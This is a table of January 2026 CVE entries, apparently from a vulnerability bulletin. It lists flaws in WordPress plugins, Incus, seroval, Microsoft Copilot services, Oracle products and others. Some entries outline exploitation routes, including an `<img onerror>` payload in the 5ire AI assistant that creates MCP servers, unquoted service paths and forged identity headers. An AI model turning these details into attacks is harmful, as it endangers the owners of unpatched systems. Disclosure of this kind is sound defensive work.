| kodezen--Academy LMS WordPress LMS Plugin for Complete eLearning Solution | The Academy LMS - WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0. This is due to the plugin not properly validating a user's identity prior to updating their password and relying solely on a publicly-exposed nonce for authorization. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and gain access to their account. | 2026-01-21 | 9.8 | CVE-2025-15521 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6687ebbe-fdf4-4ecb-bf59-034bb4b0104c?source=cve https://plugins.trac.wordpress.org/browser/academy/tags/3.5.0/includes/functions.php#L1581 |
| kohler--hotcrp | HotCRP is conference review software. A problem introduced in April 2024 in version 3.1 led to inadequately sanitized code generation for HotCRP formulas which allowed users to trigger the execution of arbitrary PHP code. The problem is patched in release version 3.2. | 2026-01-19 | 10 | CVE-2026-23836 | https://github.com/kohler/hotcrp/security/advisories/GHSA-hpqh-j6qx-x57h https://github.com/kohler/hotcrp/commit/4674fcfbb76511072a1145dad620756fc1d4b4e9 https://github.com/kohler/hotcrp/commit/bfc7e0db15df6ed6d544a639020d2ce05a5f0834 |
| Kozea--WeasyPrint | WeasyPrint helps web developers to create PDF documents. Prior to version 68.0, a server-side request forgery (SSRF) protection bypass exists in WeasyPrint's `default_url_fetcher`. The vulnerability allows attackers to access internal network resources (such as `localhost` services or cloud metadata endpoints) even when a developer has implemented a custom `url_fetcher` to block such access. This occurs because the underlying `urllib` library follows HTTP redirects automatically without re-validating the new destination against the developer's security policy. Version 68.0 contains a patch for the issue. | 2026-01-19 | 7.5 | CVE-2025-68616 | https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-983w-rhvv-gwmv https://github.com/Kozea/WeasyPrint/commit/b6a14f0f3f4ce9c0c75c1a2d73cb1c5d43f0e565 |
| laravel--reverb | Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP's unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set REVERB_SCALING_ENABLED=false to bypass the vulnerable logic entirely (if the environment uses only one Reverb node). | 2026-01-21 | 9.8 | CVE-2026-23524 | https://github.com/laravel/reverb/security/advisories/GHSA-m27r-m6rx-mhm4 https://github.com/laravel/reverb/commit/9ec26f8ffbb701f84920dd0bb9781a1797591f1a https://cwe.mitre.org/data/definitions/502.html https://github.com/laravel/reverb/releases/tag/v1.7.0 https://laravel.com/docs/12.x/reverb#scaling |
| leepeuker--movary | Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryUpdated=`. Version 0.70.0 fixes the issue. | 2026-01-19 | 9.3 | CVE-2026-23839 | https://github.com/leepeuker/movary/security/advisories/GHSA-v32w-5qx7-p3vq https://github.com/leepeuker/movary/blob/main/public/js/settings-account-location.js#L237 https://github.com/leepeuker/movary/releases/tag/0.70.0 |
| leepeuker--movary | Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryDeleted=`. Version 0.70.0 fixes the issue. | 2026-01-19 | 9.3 | CVE-2026-23840 | https://github.com/leepeuker/movary/security/advisories/GHSA-pj3m-gmq8-2r57 https://github.com/leepeuker/movary/blob/main/public/js/settings-account-location.js#L204 https://github.com/leepeuker/movary/releases/tag/0.70.0 |
| leepeuker--movary | Movary is a web application to track, rate and explore your movie watch history. Due to insufficient input validation, attackers can trigger cross-site scripting payloads in versions prior to 0.70.0. The vulnerable parameter is `?categoryCreated=`. Version 0.70.0 fixes the issue. | 2026-01-19 | 9.3 | CVE-2026-23841 | https://github.com/leepeuker/movary/security/advisories/GHSA-v877-x568-4v5v https://github.com/leepeuker/movary/releases/tag/0.70.0 |
| LiteSpeed Technologies Inc--LiteSpeed Web Server Enterprise | LiteSpeed Web Server Enterprise 5.4.11 contains an authenticated command injection vulnerability in the external app configuration interface. Authenticated administrators can inject shell commands through the 'Command' parameter in the server configuration, allowing remote code execution via path traversal and bash command injection. | 2026-01-23 | 8.8 | CVE-2021-47903 | ExploitDB-49523 LiteSpeed Technologies Official Homepage LiteSpeed Web Server Product Page VulnCheck Advisory: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection |
| LiteSpeed Technologies--OpenLiteSpeed | Openlitespeed 1.7.9 contains a stored cross-site scripting vulnerability in the dashboard's Notes parameter that allows administrators to inject malicious scripts. Attackers can craft a payload in the Notes field during listener configuration that will execute when an administrator clicks on the Default Icon. | 2026-01-21 | 7.2 | CVE-2021-47855 | ExploitDB-49727 OpenLiteSpeed Vendor Homepage VulnCheck Advisory: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting |
| Luidia--eBeam Education Suite | eBeam Education Suite 2.5.0.9 contains an unquoted service path vulnerability in the eBeam Device Service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem privileges during service startup. | 2026-01-21 | 7.8 | CVE-2021-47878 | ExploitDB-49647 Software Download Page VulnCheck Advisory: eBeam Education Suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path |
| Luidia--eBeam Interactive Suite | eBeam Interactive Suite 3.6 contains an unquoted service path vulnerability in the eBeam Stylus Driver service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\Luidia\eBeam Stylus Driver\ to inject malicious executables that would run with LocalSystem permissions. | 2026-01-21 | 7.8 | CVE-2021-47879 | ExploitDB-49648 Software Download Page VulnCheck Advisory: eBeam Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path |
| lxc--incus | Incus is a system container and virtual machine manager. In versions 6.20.0 and below, a user with the ability to launch a container with a custom YAML configuration (e.g a member of the 'incus' group) can create an environment variable containing newlines, which can be used to add additional configuration items in the container's lxc.conf due to newline injection. This can allow adding arbitrary lifecycle hooks, ultimately resulting in arbitrary command execution on the host. Exploiting this issue on IncusOS requires a slight modification of the payload to change to a different writable directory for the validation step (e.g /tmp). This can be confirmed with a second container with /tmp mounted from the host (A privileged action for validation only). A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication. | 2026-01-22 | 8.7 | CVE-2026-23953 | https://github.com/lxc/incus/security/advisories/GHSA-x6jc-phwx-hp32 https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L1081 https://github.com/user-attachments/files/24473682/environment_newline_injection.sh https://github.com/user-attachments/files/24473685/environment_newline_injection.patch |
| lxc--incus | Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the 'incus' group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication. | 2026-01-22 | 8.7 | CVE-2026-23954 | https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7 https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215 https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294 https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, due to improper input validation, a malicious object key can lead to prototype pollution during JSON deserialization. This vulnerability affects only JSON deserialization functionality. This issue is fixed in version 1.4.1. | 2026-01-21 | 7.3 | CVE-2026-23736 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hj76-42vx-jwp4 https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, improper input handling in the JSON deserialization component can lead to arbitrary JavaScript code execution. Exploitation is possible via overriding constant value and error deserialization, allowing indirect access to unsafe JS evaluation. At minimum, attackers need the ability to perform 4 separate requests on the same function, and partial knowledge of how the serialized data is used during later runtime processing. This vulnerability affects the fromJSON and fromCrossJSON functions in a client-to-server transmission scenario. This issue has been fixed in version 1.4.0. | 2026-01-21 | 7.5 | CVE-2026-23737 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-3rxj-6cgf-8cfw https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, overriding RegExp serialization with extremely large patterns can exhaust JavaScript runtime memory during deserialization. Additionally, overriding RegExp serialization with patterns that trigger catastrophic backtracking can lead to ReDoS (Regular Expression Denial of Service). This issue has been fixed in version 1.4.1. | 2026-01-22 | 7.5 | CVE-2026-23956 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-hx9m-jf43-8ffr https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, overriding encoded array lengths by replacing them with an excessively large value causes the deserialization process to significantly increase processing time. This issue has been fixed in version 1.4.1. | 2026-01-22 | 7.5 | CVE-2026-23957 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-66fc-rw6m-c2q6 https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| lxsmnsyc--seroval | Seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0 and below, serialization of objects with extreme depth can exceed the maximum call stack limit. In version 1.4.1, Seroval introduces a `depthLimit` parameter in serialization/deserialization methods. An error will be thrown if the depth limit is reached. | 2026-01-22 | 7.5 | CVE-2026-24006 | https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-3j22-8qj3-26mx https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060 |
| MacPaw Way Ltd.--Encrypto | MacPaw Encrypto 1.0.1 contains an unquoted service path vulnerability in its Encrypto Service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files\Encrypto\ to inject malicious executables and escalate privileges on Windows systems. | 2026-01-21 | 7.8 | CVE-2021-47863 | ExploitDB-49694 MacPaw Encrypto Official Homepage VulnCheck Advisory: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path |
| Magic Utilities--Magic Mouse 2 utilities | Magic Mouse 2 Utilities 2.20 contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path to inject malicious executables and gain elevated system privileges by placing a malicious file in the service path. | 2026-01-25 | 7.8 | CVE-2020-36936 | ExploitDB-49017 Magic Utilities Vendor Homepage VulnCheck Advisory: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon versions before v4.3.18, v4.4.12, and v4.5.5 do not have a limit on the maximum number of poll options for remote posts, allowing attackers to create polls with a very large amount of options, greatly increasing resource consumption. Depending on the number of poll options, an attacker can cause disproportionate resource usage in both Mastodon servers and clients, potentially causing Denial of Service either server-side or client-side. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 7.5 | CVE-2026-23962 | https://github.com/mastodon/mastodon/security/advisories/GHSA-gg8q-rcg7-p79g https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| MedDream--MedDream PACS Premium | An arbitrary file read vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted HTTP request can lead to an arbitrary file read. An attacker can send http request to trigger this vulnerability. | 2026-01-20 | 9.6 | CVE-2025-53912 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2273 |
| melapress--Melapress Role Editor | The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.1. This is due to a misconfigured capability check on the 'save_secondary_roles_field' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to assign themselves additional roles including Administrator. | 2026-01-23 | 8.8 | CVE-2025-14866 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0509aaf1-8aae-42e5-84d3-ea9b431703f3?source=cve https://plugins.trac.wordpress.org/browser/melapress-role-editor/tags/1.1.0/classes/admin/ajax/class-admin-ajax.php https://plugins.trac.wordpress.org/browser/melapress-role-editor/tags/1.1.0/classes/admin/additional-form-fields/class-user-profile.php#L103 https://plugins.trac.wordpress.org/changeset/3439348/ |
| Microsoft--Azure Data Explorer | Exposure of sensitive information to an unauthorized actor in Azure Data Explorer allows an unauthorized attacker to disclose information over a network. | 2026-01-22 | 7.4 | CVE-2026-21524 | Azure Data Explorer Information Disclosure Vulnerability |
| Microsoft--Azure Front Door | Improper access control in Azure Front Door (AFD) allows an unauthorized attacker to elevate privileges over a network. | 2026-01-22 | 9.8 | CVE-2026-24306 | Azure Front Door Elevation of Privilege Vulnerability |
| Microsoft--Azure Logic Apps | Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network. | 2026-01-22 | 8.2 | CVE-2026-21227 | Azure Logic Apps Elevation of Privilege Vulnerability |
| Microsoft--Azure Resource Manager | Improper access control in Azure Resource Manager allows an authorized attacker to elevate privileges over a network. | 2026-01-23 | 9.9 | CVE-2026-24304 | Azure Resource Manager Elevation of Privilege Vulnerability |
| Microsoft--Microsoft 365 Copilot | Improper validation of specified type of input in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-01-22 | 9.3 | CVE-2026-24307 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft 365 Word Copilot | Improper neutralization of escape, meta, or control sequences in Copilot allows an unauthorized attacker to disclose information over a network. | 2026-01-22 | 7.4 | CVE-2026-21521 | Word Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft Account | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Account allows an unauthorized attacker to perform spoofing over a network. | 2026-01-22 | 9.3 | CVE-2026-21264 | Microsoft Account Spoofing Vulnerability |
| Microsoft--Microsoft Copilot Studio | Exposure of Sensitive Information to an Unauthorized Actor in Copilot Studio allows a unauthenticated attacker to view sensitive information through network attack vector | 2026-01-22 | 7.5 | CVE-2026-21520 | Copilot Studio Information Disclosure Vulnerability |
| Microsoft--Microsoft Entra | Azure Entra ID Elevation of Privilege Vulnerability | 2026-01-22 | 9.3 | CVE-2026-24305 | Azure Entra ID Elevation of Privilege Vulnerability |
| Microvirt--MEMU PLAY | Microvirt MEMU Play 3.7.0 contains an unquoted service path vulnerability in the MEmusvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with elevated LocalSystem privileges. | 2026-01-25 | 7.8 | CVE-2020-36937 | ExploitDB-49016 Official MEMU Play Product Homepage VulnCheck Advisory: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path |
| Moodle--Moodle | A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. This is due to insufficient validation of restore input, which leads to unintended interpretation by core restore routines. Successful exploitation could result in a full compromise of the Moodle application. | 2026-01-23 | 8.8 | CVE-2025-67847 | https://access.redhat.com/security/cve/CVE-2025-67847 |
| Moodle--Moodle | Moodle 3.10.3 contains a persistent cross-site scripting vulnerability in the calendar event subtitle field that allows attackers to inject malicious scripts. Attackers can craft a calendar event with malicious JavaScript in the subtitle track label to execute arbitrary code when users view the event. | 2026-01-21 | 7.2 | CVE-2021-47857 | ExploitDB-49714 Official Moodle Project Homepage VulnCheck Advisory: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting |
| nanbingxyz--5ire | 5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. Prior to version 0.15.3, an unsafe HTML rendering permits untrusted HTML (including on* event attributes) to execute in the renderer context. An attacker can inject an `<img onerror=...>` payload to run arbitrary JavaScript in the renderer, which can call exposed bridge APIs such as `window.bridge.mcpServersManager.createServer`. This enables unauthorized creation of MCP servers and lead to remote command execution. Version 0.15.3 fixes the issue. | 2026-01-21 | 9.7 | CVE-2026-22792 | https://github.com/nanbingxyz/5ire/security/advisories/GHSA-p5fm-wm8g-rffx https://github.com/nanbingxyz/5ire/releases/tag/v0.15.3 |
| nanbingxyz--5ire | 5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. Prior to version 0.15.3, an unsafe option parsing vulnerability in the ECharts Markdown plugin allows any user able to submit ECharts code blocks to execute arbitrary JavaScript code in the renderer context. This can lead to Remote Code Execution (RCE) in environments where privileged APIs (such as Electron's electron.mcp) are exposed, resulting in full compromise of the host system. Version 0.15.3 patches the issue. | 2026-01-21 | 9.7 | CVE-2026-22793 | https://github.com/nanbingxyz/5ire/security/advisories/GHSA-wg3x-7c26-97wj https://github.com/nanbingxyz/5ire/releases/tag/v0.15.3 |
| NodeBB--NodeBB Plugin Emoji | NodeBB Plugin Emoji 3.2.1 contains an arbitrary file write vulnerability that allows administrative users to write files to arbitrary system locations through the emoji upload API. Attackers with admin access can craft file upload requests with directory traversal to overwrite system files by manipulating the file path parameter. | 2026-01-21 | 7.5 | CVE-2021-47746 | ExploitDB-49813 Official NodeBB Homepage NodeBB Emoji Plugin GitHub Repository VulnCheck Advisory: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write |
| Northwest Performance Software, Inc.--Managed Switch Port Mapping Tool | Managed Switch Port Mapping Tool 2.85.2 contains a denial of service vulnerability that allows attackers to crash the application by creating an oversized buffer. Attackers can generate a 10,000-character buffer and paste it into the IP Address and SNMP Community Name fields to trigger the application crash. | 2026-01-23 | 7.5 | CVE-2021-47894 | ExploitDB-49566 Vendor Homepage Software Download Page VulnCheck Advisory: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service |
| Nsauditor--Nsauditor | Nsauditor 3.2.2.0 contains a denial of service vulnerability that allows attackers to crash the application by overwriting the Event Description field with a large buffer. Attackers can generate a 10,000-character 'U' buffer and paste it into the Event Description field to trigger an application crash. | 2026-01-23 | 7.5 | CVE-2021-47895 | ExploitDB-49568 Official Vendor Homepage VulnCheck Advisory: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Systems contains a vulnerability in the gfx_hotspot recipe, where an attacker could cause an OS command injection by supplying a malicious string to the process_nsys_rep_cli.py script if the script is invoked manually. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure. | 2026-01-20 | 7.3 | CVE-2025-33228 | https://nvd.nist.gov/vuln/detail/CVE-2025-33228 https://www.cve.org/CVERecord?id=CVE-2025-33228 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Visual Studio for Windows contains a vulnerability in Nsight Monitor where an attacker can execute arbitrary code with the same privileges as the NVIDIA Nsight Visual Studio Edition Monitor application. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, data tampering, denial of service, and information disclosure. | 2026-01-20 | 7.3 | CVE-2025-33229 | https://nvd.nist.gov/vuln/detail/CVE-2025-33229 https://www.cve.org/CVERecord?id=CVE-2025-33229 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Systems for Linux contains a vulnerability in the .run installer, where an attacker could cause an OS command injection by supplying a malicious string to the installation path. A successful exploit of this vulnerability might lead to escalation of privileges, code execution, data tampering, denial of service, and information disclosure. | 2026-01-20 | 7.3 | CVE-2025-33230 | https://nvd.nist.gov/vuln/detail/CVE-2025-33230 https://www.cve.org/CVERecord?id=CVE-2025-33230 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| NVIDIA--Merlin Transformers4Rec | NVIDIA Merlin Transformers4Rec for all platforms contains a vulnerability where an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2026-01-20 | 7.8 | CVE-2025-33233 | https://nvd.nist.gov/vuln/detail/CVE-2025-33233 https://www.cve.org/CVERecord?id=CVE-2025-33233 https://nvidia.custhelp.com/app/answers/detail/a_id/5761 |
| OKI--Configuration Tool | OKI Configuration Tool 1.6.53 contains an unquoted service path vulnerability in the OKI Local Port Manager service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe' to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47884 | ExploitDB-49624 Archived OKI Product Webpage VulnCheck Advisory: Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path |
| OKI--Print Job Accounting | OKI Print Job Accounting 4.4.10 contains an unquoted service path vulnerability in the OkiJaSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Okidata\Print Job Accounting\' to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47887 | ExploitDB-49623 Archived OKI Product Webpage VulnCheck Advisory: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path |
| OpenStack--keystonemiddleware | An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected. | 2026-01-19 | 9.9 | CVE-2026-22797 | https://launchpad.net/bugs/2129018 https://www.openwall.com/lists/oss-security/2026/01/16/9 |
| opf--openproject | OpenProject is an open-source, web-based project management software. Versions 16.3.0 through 16.6.4 are affected by a stored cross-site scripting vulnerability in the Roadmap view. OpenProject's roadmap view renders the "Related work packages" list for each version. When a version contains work packages from a different project (e.g., a subproject), the helper link_to_work_package prepends package.project.to_s to the link and returns the entire string with .html_safe. Because project names are user-controlled and no escaping happens before calling html_safe, any HTML placed in a subproject name is injected verbatim into the page. The underlying issue is mitigated in versions 16.6.5 and 17.0.0 by setting a `X-Content-Type-Options: nosniff` header, which was in place until a refactoring move to Rails standard content-security policy, which did not properly apply this header in the new configuration since OpenProject 16.3.0. Those who cannot upgrade their installations should ensure that they add a X-Content-Type-Options: nosniff header in their proxying web application server. | 2026-01-19 | 8.7 | CVE-2026-23625 | https://github.com/opf/openproject/security/advisories/GHSA-cvpq-cc56-gwxx https://github.com/opf/openproject/releases/tag/v16.6.5 https://github.com/opf/openproject/releases/tag/v17.0.0 |
| Oracle Corporation--Oracle Agile PLM | Vulnerability in the Oracle Agile PLM product of Oracle Supply Chain (component: User and User Group). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 7.5 | CVE-2026-21940 | Oracle Advisory |
| Oracle Corporation--Oracle Agile Product Lifecycle Management for Process | Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Supplier Portal). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in takeover of Oracle Agile Product Lifecycle Management for Process. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-01-20 | 9.8 | CVE-2026-21969 | Oracle Advisory |
| Oracle Corporation--Oracle Business Intelligence Enterprise Edition | Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Oracle Analytics Cloud). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Business Intelligence Enterprise Edition executes to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-01-20 | 7.1 | CVE-2026-21976 | Oracle Advisory |
| Oracle Corporation--Oracle Database Server | Vulnerability in the SQLcl component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.0. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where SQLcl executes to compromise SQLcl. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of SQLcl. CVSS 3.1 Base Score 7.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). | 2026-01-20 | 7 | CVE-2026-21939 | Oracle Advisory |
| Oracle Corporation--Oracle FLEXCUBE Investor Servicing | Vulnerability in the Oracle FLEXCUBE Investor Servicing product of Oracle Financial Services Applications (component: Security Management System). Supported versions that are affected are 14.5.0.15.0, 14.7.0.8.0 and 14.8.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Investor Servicing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle FLEXCUBE Investor Servicing accessible data as well as unauthorized access to critical data or complete access to all Oracle FLEXCUBE Investor Servicing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-01-20 | 8.1 | CVE-2026-21973 | Oracle Advisory |
| Oracle Corporation--Oracle Hospitality OPERA 5 | Vulnerability in the Oracle Hospitality OPERA 5 product of Oracle Hospitality Applications (component: Opera Servlet). Supported versions that are affected are 5.6.19.23, 5.6.25.17, 5.6.26.10 and 5.6.27.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality OPERA 5 accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hospitality OPERA 5. CVSS 3.1 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L). | 2026-01-20 | 8.6 | CVE-2026-21967 | Oracle Advisory |
| Oracle Corporation--Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in | Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in product of Oracle Fusion Middleware (component: Weblogic Server Proxy Plug-in for Apache HTTP Server, Weblogic Server Proxy Plug-in for IIS). Supported versions that are affected are 12.2.1.4.0, 14.1.1.0.0 and 14.1.2.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in. While the vulnerability is in Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data as well as unauthorized access to critical data or complete access to all Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in accessible data. Note: Affected version for Weblogic Server Proxy Plug-in for IIS is 12.2.1.4.0 only. CVSS 3.1 Base Score 10.0 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N). | 2026-01-20 | 10 | CVE-2026-21962 | Oracle Advisory |
